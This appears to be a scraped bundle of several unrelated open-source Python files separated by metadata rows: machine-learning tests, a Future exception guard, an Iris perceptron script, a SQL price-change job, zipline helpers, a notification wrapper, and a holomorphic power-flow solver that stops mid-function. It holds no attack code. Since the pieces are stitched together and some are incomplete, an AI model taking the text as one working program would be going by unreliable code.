prediction_prefix=prediction_prefix)
with open(prediction_prefix + '.predictions', 'r') as f:
reader = csv.reader(f, dialect='excel-tab')
next(reader)
pred = [row[1] for row in reader]
eq_(len(pred), 15)
def check_sparse_predict(learner_name, expected_score, use_feature_hashing=False):
train_fs, test_fs = make_sparse_data(
use_feature_hashing=use_feature_hashing)
# train a logistic regression classifier on the training
# data and evalute on the testing data
learner = Learner(learner_name)
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
assert_almost_equal(test_score, expected_score)
def test_sparse_predict():
for learner_name, expected_scores in zip(['LogisticRegression',
'DecisionTreeClassifier',
'RandomForestClassifier',
'AdaBoostClassifier',
'MultinomialNB',
'KNeighborsClassifier'],
[(0.45, 0.51), (0.5, 0.51),
(0.46, 0.46), (0.5, 0.5),
(0.44, 0), (0.51, 0.43)]):
yield check_sparse_predict, learner_name, expected_scores[0], False
if learner_name != 'MultinomialNB':
yield check_sparse_predict, learner_name, expected_scores[1], True
def check_sparse_predict_sampler(use_feature_hashing=False):
train_fs, test_fs = make_sparse_data(
use_feature_hashing=use_feature_hashing)
if use_feature_hashing:
sampler = 'RBFSampler'
sampler_parameters = {"gamma": 1.0, "n_components": 50}
else:
sampler = 'Nystroem'
sampler_parameters = {"gamma": 1.0, "n_components": 50,
"kernel": 'rbf'}
learner = Learner('LogisticRegression',
sampler=sampler,
sampler_kwargs=sampler_parameters)
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
expected_score = 0.44 if use_feature_hashing else 0.48999999999999999
assert_almost_equal(test_score, expected_score)
def test_sparse_predict_sampler():
yield check_sparse_predict_sampler, False
yield check_sparse_predict_sampler, True
def make_single_file_featureset_data():
"""
Write a training file and a test file for tests that check whether
specifying train_file and test_file actually works.
"""
train_fs, test_fs = make_classification_data(num_examples=600,
train_test_ratio=0.8,
num_labels=2,
num_features=3,
non_negative=False)
# Write training feature set to a file
train_path = join(_my_dir, 'train', 'train_single_file.jsonlines')
writer = NDJWriter(train_path, train_fs)
writer.write()
# Write test feature set to a file
test_path = join(_my_dir, 'test', 'test_single_file.jsonlines')
writer = NDJWriter(test_path, test_fs)
writer.write()
def test_train_file_test_file():
"""
Test that train_file and test_file experiments work
"""
# Create data files
make_single_file_featureset_data()
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'))
run_configuration(config_path, quiet=True)
# Check results
with open(join(_my_dir, 'output', ('train_test_single_file_train_train_'
'single_file.jsonlines_test_test_single'
'_file.jsonlines_RandomForestClassifier'
'.results.json'))) as f:
result_dict = json.load(f)[0]
assert_almost_equal(result_dict['score'], 0.925)
@raises(ValueError)
def test_train_file_and_train_directory():
"""
Test that train_file + train_directory = ValueError
"""
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'),
train_directory='foo')
_parse_config_file(config_path)
@raises(ValueError)
def test_test_file_and_test_directory():
"""
Test that test_file + test_directory = ValueError
"""
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'),
test_directory='foo')
_parse_config_file(config_path)
def check_adaboost_predict(base_estimator, algorithm, expected_score):
train_fs, test_fs = make_sparse_data()
# train an AdaBoostClassifier on the training data and evalute on the
# testing data
learner = Learner('AdaBoostClassifier', model_kwargs={'base_estimator': base_estimator,
'algorithm': algorithm})
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
assert_almost_equal(test_score, expected_score)
def test_adaboost_predict():
for base_estimator_name, algorithm, expected_score in zip(['MultinomialNB',
'DecisionTreeClassifier',
'SGDClassifier',
'SVC'],
['SAMME.R', 'SAMME.R',
'SAMME', 'SAMME'],
[0.45, 0.5, 0.45, 0.43]):
yield check_adaboost_predict, base_estimator_name, algorithm, expected_score
| bsd-3-clause | 3,986,852,876,339,038,700 | 38.489231 | 91 | 0.52883 | false |
mikhtonyuk/rxpython | concurrent/futures/cooperative/ensure_exception_handled.py | 1 | 3261 | import traceback
class EnsureExceptionHandledGuard:
"""Helper for ensuring that Future's exceptions were handled.
This solves a nasty problem with Futures and Tasks that have an
exception set: if nobody asks for the exception, the exception is
never logged. This violates the Zen of Python: 'Errors should
never pass silently. Unless explicitly silenced.'
However, we don't want to log the exception as soon as
set_exception() is called: if the calling code is written
properly, it will get the exception and handle it properly. But
we *do* want to log it if result() or exception() was never called
-- otherwise developers waste a lot of time wondering why their
buggy code fails silently.
An earlier attempt added a __del__() method to the Future class
itself, but this backfired because the presence of __del__()
prevents garbage collection from breaking cycles. A way out of
this catch-22 is to avoid having a __del__() method on the Future
class itself, but instead to have a reference to a helper object
with a __del__() method that logs the traceback, where we ensure
that the helper object doesn't participate in cycles, and only the
Future has a reference to it.
The helper object is added when set_exception() is called. When
the Future is collected, and the helper is present, the helper
object is also collected, and its __del__() method will log the
traceback. When the Future's result() or exception() method is
called (and a helper object is present), it removes the helper
object, after calling its clear() method to prevent it from
logging.
One downside is that we do a fair amount of work to extract the
traceback from the exception, even when it is never logged. It
would seem cheaper to just store the exception object, but that
references the traceback, which references stack frames, which may
reference the Future, which references the _EnsureExceptionHandledGuard,
and then the _EnsureExceptionHandledGuard would be included in a cycle,
which is what we're trying to avoid! As an optimization, we don't
immediately format the exception; we only do the work when
activate() is called, which call is delayed until after all the
Future's callbacks have run. Usually a Future has at least one
callback (typically set by 'yield from'), and usually that callback
extracts the result or exception, which removes the need to format
the exception at all.
PS. I don't claim credit for this solution. I first heard of it
in a discussion about closing files when they are collected.
"""
__slots__ = ['exc', 'tb', 'hndl', 'cls']
def __init__(self, exc, handler):
self.exc = exc
self.hndl = handler
self.cls = type(exc)
self.tb = None
def activate(self):
exc = self.exc
if exc is not None:
self.exc = None
self.tb = traceback.format_exception(exc.__class__, exc,
exc.__traceback__)
def clear(self):
self.exc = None
self.tb = None
def __del__(self):
if self.tb:
self.hndl(self.cls, self.tb)
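# --- Illustrative usage sketch (added for clarity; not part of the original
# module). The Future-like class below is hypothetical and only shows the
# intended life cycle: attach the guard in set_exception(), activate() it once
# the callbacks have run, and clear() it when the exception is consumed.
if __name__ == '__main__':
    import sys
    class _DemoFuture:
        def __init__(self):
            self._guard = None
        def set_exception(self, exc):
            # attach the guard; if nobody ever consumes the exception,
            # the guard's __del__ will log the formatted traceback
            self._guard = EnsureExceptionHandledGuard(exc, self._log)
            self._guard.activate()
        def exception(self):
            # consuming the exception disarms the guard
            if self._guard is not None:
                self._guard.clear()
                self._guard = None
        @staticmethod
        def _log(exc_cls, tb_lines):
            sys.stderr.write('unhandled %s:\n%s' % (exc_cls.__name__,
                                                    ''.join(tb_lines)))
    fut = _DemoFuture()
    fut.set_exception(ValueError('never handled'))
    del fut  # the guard is collected with the future and logs the traceback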
| mit | -4,323,449,782,726,556,700 | 42.48 | 76 | 0.682306 | false |
bhedayat/Neural-Nets | Perceptron.py | 1 | 3593 |
# coding: utf-8
# In[22]:
#Flower Classifier with Perceptron
#Read in data
data = [] #training data
data1 = [] #test data
import numpy as np
import matplotlib.pyplot as plt
from random import randint
# NOTE: the original notebook cell never opens these files; the two open()
# calls below are assumed placeholders for the Iris training and test data.
file = open('iris_train.csv')   # hypothetical path
file1 = open('iris_test.csv')   # hypothetical path
for line in file:
l = (line.split(","))
l[0] = float(l[0])
l[1] = float(l[1])
l[2] = float(l[2])
l[3] = float(l[3])
data.append (l)
for line1 in file1:
h = (line1.split(","))
h[0] = float(h[0])
h[1] = float(h[1])
h[2] = float(h[2])
h[3] = float(h[3])
data1.append (h)
#Label classes with numbers
for d in range(len(data)):
if data[d][4] == 'Iris-setosa\n':
data[d][4] = 0
elif data[d][4] == 'Iris-versicolor\n':
data[d][4] = 1
for d in range(len(data1)):
if data1[d][4] == 'Iris-setosa\n':
data1[d][4] = 0
elif data1[d][4] == 'Iris-versicolor\n':
data1[d][4] = 1
iris_data = np.array(data)
iris_test = np.array(data1)
#Normalize features with Z-score
for d in range(iris_data.shape[1]-1):
u = np.mean(iris_data[:,d])
s = np.std(iris_data[:,d])
iris_data[:,d] = (iris_data[:,d] - u)/s
iris_test[:,d] = (iris_test[:,d] - u)/s
#Scatter plots in different feature space
f1 = iris_data[:,0] #Sepal length
f2 = iris_data[:,1] #Sepal width
f3 = iris_data[:,2] #Petal length
f4 = iris_data[:,3] #Petal width
cluster = iris_data[:,4] #Flower class
plt.figure(1)
plt.scatter(f1[cluster==0],f2[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f2[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.title('Sepal length vs. Sepal width')
plt.figure(2)
plt.scatter(f1[cluster==0],f3[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f3[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Petal length')
plt.title('Sepal length vs. Petal length')
plt.figure(3)
plt.scatter(f1[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f1[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Sepal length')
plt.ylabel('Petal width')
plt.title('Sepal length vs. Petal width')
plt.figure(4)
plt.scatter(f2[cluster==0],f3[cluster==0],marker='+')
plt.scatter(f2[cluster==1],f3[cluster==1],marker='^')
plt.xlabel('Sepal width')
plt.ylabel('Petal length')
plt.title('Sepal width vs. Petal length')
plt.figure(5)
plt.scatter(f2[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f2[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Sepal width')
plt.ylabel('Petal width')
plt.title('Sepal width vs. Petal width')
plt.figure(6)
plt.scatter(f3[cluster==0],f4[cluster==0],marker='+')
plt.scatter(f3[cluster==1],f4[cluster==1],marker='^')
plt.xlabel('Petal length')
plt.ylabel('Petal width')
plt.title('Petal length vs. Petal width')
#plt.show()
#Append bias to data set
x = -1*np.ones((len(iris_data),1))
a_iris_data = np.concatenate((x, iris_data), 1)
y = -1*np.ones((len(iris_test),1))
a_iris_test = np.concatenate((y, iris_test), 1)
w = [0]*(len(a_iris_data[0])-1)
#Perceptron Gradient Descent
alpha = 1 #Learning rate
for a in range(30):
r = randint(0,len(a_iris_data)-1) #randomly choose training examples
output = a_iris_data[r,0:5].dot(w)
teacher = a_iris_data[r,5]
if output >= -w[0]:
output = 1
elif output < -w[0]:
output = 0
w = w+alpha*(teacher-output)*(a_iris_data[r,0:5]) #delta rule
print(w)
#Testing accuracy
test_output = a_iris_test[:,0:5].dot(w)
for o in range(len(test_output)):
if test_output[o] >= -w[0]:
test_output[o] = 1
elif test_output[o] < -w[0]:
test_output[o] = 0
err = test_output == a_iris_test[:,5]
err = err.astype(int)
1 - np.mean(err)
# In[ ]:
| apache-2.0 | -4,896,690,168,427,554,000 | 26.638462 | 72 | 0.623991 | false |
vishakh/metamkt | metamkt/standalone/price_change_calculator.py | 1 | 2433 | import common
def calculate_price_change(conn, entity_id, mysql_interval):
result = conn.execute("""
select
(select price from PriceHistory where entity_id=%s order by timestamp desc limit 1) -
(select price from PriceHistory where entity_id=%s and timestamp < (utc_timestamp() - %s)
order by timestamp desc limit 1)""" % (entity_id, entity_id, mysql_interval))
change = result.fetchall()[0][0]
return change
def insert_price_change(conn, entity_id, interval, value):
conn.execute("""INSERT INTO PriceChange (entity_id, term, value) VALUES (%s, '%s', %s)"""
% (entity_id, interval, value))
def calculate_price_changes():
log = common.get_logger()
log.info('Calculating price changes..')
conn = common.get_connection()
trans = conn.begin()
try:
conn.execute("truncate PriceChange")
conn.execute("SELECT id FROM Entity")
users = conn.fetchall()
for user in users:
eid = user[0]
change = calculate_price_change(conn, eid, "INTERVAL 1 DAY")
if change is None:
change = 0
insert_price_change(conn, eid, "1D", change)
change = calculate_price_change(conn, eid, "INTERVAL 7 DAY")
if change is None:
change = 0
insert_price_change(conn, eid, "7D", change)
change = calculate_price_change(conn, eid, "INTERVAL 1 MONTH")
if change is None:
change = 0
insert_price_change(conn, eid, "1M", change)
change = calculate_price_change(conn, eid, "INTERVAL 3 MONTH")
if change is None:
change = 0
insert_price_change(conn, eid, "3M", change)
change = calculate_price_change(conn, eid, "INTERVAL 6 MONTH")
if change is None:
change = 0
insert_price_change(conn, eid, "6M", change)
change = calculate_price_change(conn, eid, "INTERVAL 1 YEAR")
if change is None:
change = 0
insert_price_change(conn, eid, "1Y", change)
trans.commit()
except:
trans.rollback()
raise
conn.close()
log.info('..done.')
def main():
calculate_price_changes()
if __name__ == "__main__":
main() | lgpl-3.0 | -6,761,154,637,958,323,000 | 31.026316 | 117 | 0.547061 | false |
lsbardel/zipline | zipline/gens/utils.py | 1 | 2276 | #
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytz
import numbers
from hashlib import md5
from datetime import datetime
from zipline.protocol import DATASOURCE_TYPE
from six import iteritems, b
def hash_args(*args, **kwargs):
"""Define a unique string for any set of representable args."""
arg_string = '_'.join([str(arg) for arg in args])
kwarg_string = '_'.join([str(key) + '=' + str(value)
for key, value in iteritems(kwargs)])
combined = ':'.join([arg_string, kwarg_string])
hasher = md5()
hasher.update(b(combined))
return hasher.hexdigest()
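# Illustrative usage (added for clarity; not part of the original module):
# the digest is stable for identical arguments, which is what makes it safe
# to use as a cache/memoization key. The argument values below are arbitrary.
#
#   >>> key = hash_args('AAPL', 10, interval='minute')
#   >>> key == hash_args('AAPL', 10, interval='minute')
#   True
#   >>> key == hash_args('AAPL', 11, interval='minute')
#   False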
def assert_datasource_protocol(event):
"""Assert that an event meets the protocol for datasource outputs."""
assert event.type in DATASOURCE_TYPE
# Done packets have no dt.
if not event.type == DATASOURCE_TYPE.DONE:
assert isinstance(event.dt, datetime)
assert event.dt.tzinfo == pytz.utc
def assert_trade_protocol(event):
"""Assert that an event meets the protocol for datasource TRADE outputs."""
assert_datasource_protocol(event)
assert event.type == DATASOURCE_TYPE.TRADE
assert isinstance(event.sid, int)
assert isinstance(event.price, numbers.Real)
assert isinstance(event.volume, numbers.Integral)
assert isinstance(event.dt, datetime)
def assert_datasource_unframe_protocol(event):
"""Assert that an event is valid output of zp.DATASOURCE_UNFRAME."""
assert event.type in DATASOURCE_TYPE
def assert_sort_protocol(event):
"""Assert that an event is valid input to zp.FEED_FRAME."""
assert event.type in DATASOURCE_TYPE
def assert_sort_unframe_protocol(event):
"""Same as above."""
assert event.type in DATASOURCE_TYPE
| apache-2.0 | -6,486,776,239,556,615,000 | 30.178082 | 79 | 0.710018 | false |
emesene/emesene | emesene/gui/common/GNTPNotification.py | 1 | 2006 | # -*- coding: utf-8 -*-
# This file is part of emesene.
#
# emesene is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# emesene is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with emesene; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import gntp.notifier
import sys
import gui
from gui.base import Plus
NAME = 'GNTPNotification'
DESCRIPTION = 'Wrapper around GNTP for the notification system'
AUTHOR = 'joshf'
WEBSITE = 'www.github.com/joshf'
VERSION = '1.1'
def GNTPNotification(title, text, picture_path=None, const=None,
callback=None, tooltip=None):
title = Plus.msnplus_strip(title)
if sys.platform == 'darwin':
appicon = open(gui.theme.image_theme.logo).read()
imagepath = picture_path.replace( "file:///", "/" )
icon = open(imagepath).read()
else:
appicon = gui.theme.image_theme.logo
icon = picture_path
growl = gntp.notifier.GrowlNotifier(
applicationName = "emesene",
applicationIcon = appicon,
notifications = ["Generic Notification"],
defaultNotifications = ["Generic Notification"],
# hostname = "computer.example.com", # Defaults to localhost
# password = "abc123" # Defaults to a blank password
)
growl.register()
growl.notify(
noteType = "Generic Notification",
title = title,
description = text,
icon = icon,
sticky = False,
priority = 1,
)
| gpl-3.0 | -8,234,481,197,409,525,000 | 30.84127 | 79 | 0.659023 | false |
SanPen/GridCal | src/research/power_flow/helm/old/Helm.py | 1 | 19811 | # -*- coding: utf-8 -*-
# This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import Desarrollos.power_flow_research.example_grids as grids
import numpy as np
np.set_printoptions(linewidth=320)
# np.set_printoptions(precision=6, suppress=True, linewidth=320)
from numpy import where, zeros, ones, mod, conj, array, dot, complex128
from numpy import poly1d, r_, eye, hstack, diag, linalg, Inf
from enum import Enum
from itertools import product
from scipy import fftpack
from scipy.linalg import solve
from scipy.sparse.linalg import factorized, spsolve
from scipy.sparse import issparse, csc_matrix as sparse
# just in time compiler
# from numba import jit
# Set the complex precision to use
complex_type = complex128
class NodeType(Enum):
PQ = 1,
PV = 2,
REF = 3,
NONE = 4,
STO_DISPATCH = 5 # Storage dispatch, in practice it is the same as REF
# @jit(cache=True)
def pre_process(n_bus, Yseries, Vset, pq, pv, vd):
"""
Make the Helm System matrix
@param n_bus: Number of buses of the circuit
@param Yseries: Circuit admittance matrix of the series elements
@param Vset: Vector of voltages of those nodes where the voltage is controlled (AKA Slack and PV buses)
@param pq: list of PQ node indices
@param pv: list of PV node indices
@param vd: list of Slack node indices
@return:
"""
"""
Reduction of the circuit magnitudes.
Args:
n_bus:
Yseries:
slack_indices: Array of indices of the slack nodes
Vset:
S:
Output:
Yred: Reduced admittance matrix (Without the rows and columns belonging to slack buses)
I: Matrix of currents (In practice only one slack bus is selected, hence it is a vector) injected by the slack buses
Sred: Array of power injections of the buses that are not of type slack
types_red: Array of types of the buses that are not of type slack
non_slack_indices: Array of indices of the buses that are not of type slack
"""
# now to have efficient arrays of coefficients
map_idx = zeros(n_bus, dtype=np.int)
map_w = zeros(n_bus, dtype=np.int)
npq = 0
npv = 0
npqpv = 0
for i in pq:
map_idx[i] = npq
map_w[i] = npqpv
npq += 1
npqpv += 1
for i in pv:
map_idx[i] = npv
map_w[i] = npqpv
npv += 1
npqpv += 1
# build the expanded system matrix
Ysys = zeros((2*n_bus, 2*n_bus))
for a, b in product(range(n_bus), range(n_bus)):
Ysys[2*a, 2*b] = Yseries[a, b].real
Ysys[2*a, 2*b+1] = -Yseries[a, b].imag
Ysys[2*a+1, 2*b] = Yseries[a, b].imag
Ysys[2*a+1, 2*b+1] = Yseries[a, b].real
# set pv column
for a in pv:
b = a
Ysys[:, 2*b] = zeros(2 * n_bus)
# Ysys[a*2, b*2+1] = 0
Ysys[a*2+1, b*2] = 1
# set vd elements
for a in vd:
Ysys[a*2, :] = zeros(2 * n_bus)
Ysys[a*2 + 1, :] = zeros(2 * n_bus)
Ysys[a*2, a*2] = 1
Ysys[a*2+1, a*2+1] = 1
# print('Ysys\n', Ysys)
# build the PV matrix
Ypv = zeros((2 * n_bus, npv))
for a, b in product(r_[pq, pv], pv):
kk = map_idx[b]
Ypv[2*a, kk] = Yseries[a, b].real
Ypv[2*a+1, kk] = Yseries[a, b].imag
# print('Ypv\n', Ypv)
Vset2 = Vset * Vset
return sparse(Ysys), Ypv, Vset2, map_idx, map_w, npq, npv
# @jit(cache=True)
def RHS(n, nbus, Ysh, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w):
"""
Right hand side calculation.
Args:
n: Order of the coefficients
nbus: Number of buses (not counting the slack buses)
Ysh: Vector where every element is the sum of the corresponding row of the shunt admittance matrix
I: Vector of current injections (nbus elements)
S: Vector of power injections (nbus elements)
Vset: Vector of set voltages
Vset_abs2: Vector with the voltage set points squared. (nbus elements)
C: Voltage coefficients (Ncoeff x nbus elements)
X: Weighted coefficients (Ncoeff x nbus elements)
R: Voltage convolution coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
types: Types of the non slack buses (nbus elements)
Output:
rhs: Right hand side vector to solve the coefficients (2 * nbus elements)
"""
rhs = np.empty(2 * nbus)
Vre = ones(len(pv))
for k in pq:
val = RHS_PQ(n, k, Ysh, C, S, W, map_w)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
for k in vd:
val = RHS_VD(n, k, Vset)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
for k in pv:
val = RHS_PV(n, k, Ysh, S, C, Q, W, map_idx, map_w)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
kk = map_idx[k]
Vre[kk] = calc_Vre(n, k, C, Vset_abs2).real
rhs -= Ypv[:, kk] * Vre[kk]
return rhs, Vre
def delta(n, k):
return n == k # is 1 for n==k, 0 otherwise
# @jit(cache=True)
def RHS_VD(n, k, Vset):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Vset: set voltage of the node
Output:
Right hand side value for slack nodes
"""
if n == 0:
return complex_type(1) * delta(n, 0)
else:
return (Vset[k] - complex_type(1)) * delta(n, 1)
# @jit(cache=True)
def RHS_PQ(n, k, Ysh, C, S, W, map_w):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Ysh: Vector where every element is the sum of the corresponding row of the shunt admittance matrix
I: Vector of current injections (nbus elements)
S: Vector of power injections (nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Right hand side value
"""
if n == 0:
return 0
else:
kw = map_w[k]
return conj(S[k]) * conj(W[n-1, kw]) - Ysh[k] * C[n - 1, k] # ASU version
def calc_W(n, k, kw, C, W):
"""
Calculation of the inverse coefficients W. (only applicable for PQ buses)
Args:
n: Order of the coefficients
k: Index of the bus
C: Voltage coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Inverse coefficient of order n for the bus k
"""
if n == 0:
res = complex_type(1)
else:
res = complex_type(0)
for l in range(n):
res -= W[l, kw] * C[n-l, k]
res /= conj(C[0, k])
return res
def RHS_PV(n, k, Ysh, S, C, Q, W, map_idx, map_w):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Ysh: Vector where every element is the sum of the corresponding row of the shunt admittance matrix
S: Vector of power injections (nbus elements)
C: Voltage coefficients (Ncoeff x nbus elements)
Q: Reactive power coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Right hand side value for the pv nodes
"""
if n == 0:
return 0 # -1j * Q[0, kk] / conj(C[0, k])
else:
kk = map_idx[k]
kw = map_w[k]
val = complex_type(0)
for l in range(1, n): # this includes the n-1
val += Q[l, kk] * W[n-l, kw].conjugate()
n1 = n-1
rhs = S[k].real * W[n1, kw].conjugate() - (1j * val) - Ysh[k] * C[n1, k]
return rhs
def calc_Vre(n, k, C, Vset_abs2):
"""
Compute the real part of the voltage for PV ndes
Args:
n: order
k: PV node index
C: Structure of voltage coefficients
Vset_abs2: Square of the set voltage module
Returns:
Real part of the voltage for the PV nodes
"""
# vre = delta(n, 0) + 0.5 * delta(n, 1) * (Vset_abs2[k] - 1) - 0.5 * R
if n == 0:
return complex_type(1)
elif n == 1:
R = calc_R(n, k, C)
return 0.5 * (Vset_abs2[k] - 1) - 0.5 * R
else:
return complex_type(0)
def calc_R(n, k, C):
"""
Convolution coefficient
Args:
n: Order of the coefficients
k: Index of the bus
C: Voltage coefficients (Ncoeff x nbus elements)
Output:
Convolution coefficient of order n for the bus k
"""
result = complex_type(0)
for l in range(n+1):
result += C[l, k] * C[n-l, k].conjugate()
return result
def epsilon(Sn, n, E):
"""
Fast recursive Wynn's epsilon algorithm from:
NONLINEAR SEQUENCE TRANSFORMATIONS FOR THE ACCELERATION OF CONVERGENCE
AND THE SUMMATION OF DIVERGENT SERIES
by Ernst Joachim Weniger
"""
Zero = complex_type(0)
One = complex_type(1)
Tiny = np.finfo(complex_type).min
Huge = np.finfo(complex_type).max
E[n] = Sn
if n == 0:
estim = Sn
else:
AUX2 = Zero
for j in range(n, 0, -1): # range from n to 1 (both included)
AUX1 = AUX2
AUX2 = E[j-1]
DIFF = E[j] - AUX2
if abs(DIFF) <= Tiny:
E[j-1] = Huge
else:
if DIFF == 0:
DIFF = Tiny
E[j-1] = AUX1 + One / DIFF
if mod(n, 2) == 0:
estim = E[0]
else:
estim = E[1]
return estim, E
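# --- Illustrative self-check (added; not part of the original module) ---
# Wynn's epsilon algorithm accelerates slowly converging sequences. The helper
# below is a hypothetical, self-contained example (unrelated to the power-flow
# data): it feeds the partial sums of the alternating harmonic series, whose
# limit is ln(2), and returns the remaining error of the accelerated estimate.
def _epsilon_sanity_check(n_terms=15):
    from math import log
    E = zeros(n_terms, dtype=complex_type)
    partial_sum = complex_type(0)
    estimate = partial_sum
    for n in range(n_terms):
        partial_sum += (-1.0) ** n / (n + 1)  # 1 - 1/2 + 1/3 - 1/4 + ...
        estimate, E = epsilon(partial_sum, n, E)
    # the accelerated estimate lies far closer to ln(2) than partial_sum does
    return abs(estimate - log(2))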
def pade_approximation(n, an, s=1):
"""
Computes the n/2 pade approximant of the series an at the approximation
point s
Arguments:
an: coefficient series
n: order of the series
s: point of approximation
Returns:
pade approximation at s
"""
nn = int(n/2)
if mod(nn, 2) == 0:
nn -= 1
L = nn
M = nn
an = np.ndarray.flatten(an)
rhs = an[L+1:L+M+1]
C = zeros((L, M), dtype=complex_type)
for i in range(L):
k = i + 1
C[i, :] = an[L-M+k:L+k]
try:
b = solve(C, -rhs) # bn to b1
except:
print()
return 0, zeros(L+1, dtype=complex_type), zeros(L+1, dtype=complex_type)
b = r_[1, b[::-1]] # b0 = 1
a = zeros(L+1, dtype=complex_type)
a[0] = an[0]
for i in range(L):
val = complex_type(0)
k = i + 1
for j in range(k+1):
val += an[k-j] * b[j]
a[i+1] = val
p = complex_type(0)
q = complex_type(0)
for i in range(L+1):
p += a[i] * s**i
q += b[i] * s**i
return p/q, a, b
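# --- Illustrative self-check (added; not part of the original module) ---
# A Padé approximant built from Taylor coefficients normally reproduces the
# underlying function far better than the truncated series itself. The helper
# below is a hypothetical sanity check, unrelated to the power-flow data: it
# feeds the Taylor coefficients of exp(x) and evaluates the approximant at 1.
def _pade_sanity_check(order=10):
    from math import factorial, exp
    coeffs = np.array([1.0 / factorial(k) for k in range(order + 1)],
                      dtype=complex_type)
    approx, _, _ = pade_approximation(order, coeffs, s=1)
    # the error should be tiny (roughly 1e-9 or below for order=10)
    return abs(approx - exp(1.0))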
def interprete_solution(nbus, npv, pv, pqvd, x_sol, Vre, map_idx):
"""
Assign the solution vector individual values to the correct places
Args:
nbus: number of system nodes
npv: number of pv nodes
types: types of each node
x_sol: solution vector to analyze
Vre: Vector or real part of the voltage for the PV nodes
map_idx: mapping array from normal bus index to PV index
Returns:
Voltages coefficients and reactive power coefficients for the PV nodes at the order of x_sol
"""
C = zeros(nbus, dtype=complex_type)
Q = zeros(npv)
# for k in pqvd: # non vectorized code
# C[k] = x_sol[2 * k] + 1j * x_sol[2 * k + 1]
# set the PQ and Slack nodes
C[pqvd] = x_sol[2 * pqvd] + 1j * x_sol[2 * pqvd + 1]
# for k in pv: # non vectorized code
# kk = map_idx[k]
# Q[kk] = x_sol[2 * k]
# C[k] = Vre[kk] + 1j * x_sol[2 * k + 1]
# Set the PV nodes
kk = map_idx[pv]
Q[kk] = x_sol[2 * pv]
C[pv] = Vre[kk] + 1j * x_sol[2 * pv + 1]
return C, Q
def helm(Y, Ys, Ysh, max_coefficient_count, S, voltage_set_points, pq, pv, vd, eps=1e-3, use_pade=True):
"""
Run the holomorphic embedding power flow
@param Y: Circuit complete admittance matrix
@param Ys: Circuit series elements admittance matrix
@param Ysh: Circuit shunt elements admittance matrix
@param max_coefficient_count: Maximum number of voltage coefficients to evaluate (Must be an odd number)
@param S: Array of power injections matching the admittance matrix size
@param voltage_set_points: Array of voltage set points matching the admittance matrix size
@param pq: list of PQ node indices
@param pv: list of PV node indices
@param vd: list of Slack node indices
@param eps: Tolerance
@param use_pade: Use the Padé approximation? If False the Epsilon algorithm is used
@return:
"""
nbus = np.shape(Ys)[0]
# The routines in this script are meant to handle sparse matrices, hence non-sparse ones are not allowed
assert(issparse(Ys))
# assert(not np.all((Ys + sparse(np.eye(nbus) * Ysh) != Y).data))
# Make bus type lists combinations that are going to be used later
pqvd = r_[pq, vd]
pqvd.sort()
pqpv = r_[pq, pv]
pqpv.sort()
print('Ymat:\n', Y.todense())
print('Yseries:\n', Ys.todense())
print('Yshunt:\n', Ysh)
# prepare the arrays
Ysys, Ypv, Vset, map_idx, map_w, npq, npv = pre_process(n_bus=nbus, Yseries=Ys, Vset=voltage_set_points,
pq=pq, pv=pv, vd=vd)
